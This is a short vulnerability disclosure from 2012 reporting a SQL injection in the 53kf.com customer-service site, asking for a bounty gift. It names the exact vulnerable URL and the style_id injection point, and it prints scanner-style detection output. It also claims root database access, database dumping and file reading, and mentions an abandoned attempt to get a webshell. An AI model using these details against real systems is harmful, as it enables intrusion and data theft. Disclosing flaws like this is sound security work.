Another root SQL injection on the 53KF platform; like brother clzzy, asking for a gift!

2012-10-11T00:00:00
ID SSV:94375
Type seebug
Reporter Root
Modified 2012-10-11T00:00:00

Description

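Brief description:

A severe SQL injection vulnerability on 53kf.com allows the databases of the main site and several of its sub-sites to be dumped. The MySQL user is root; it cannot write files, but it can read files, so the source code of files is fully exposed~~ Since I could not find the admin backend, I have not obtained a webshell for now; whether or not I get a shell it will probably be 20 Rank anyway, so I did not bother~ I am borrowing clzzy's description so I don't have to type it out! Asking for a gift.

Detailed description:

A severe SQL injection vulnerability on 53kf.com allows the databases of the main site and several of its sub-sites to be dumped. The MySQL user is root; it cannot write files, but it can read files, so the source code of files is fully exposed~~ Since I could not find the admin backend, I have not obtained a webshell for now; whether or not I get a shell it will probably be 20 Rank anyway, so I did not bother~ I am borrowing clzzy's description so I don't have to type it out! Asking for a gift.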

Proof of vulnerability:

Target: http://kf1.53kf.com/iframe_brief.php?style_id=%Inject_Here%&language=cn10009
Date: 2012/10/11 10:24:38
DB Detection: MySQL >=5 (Auto Detected)
Method: GET
Type: Integer (Auto Detected)

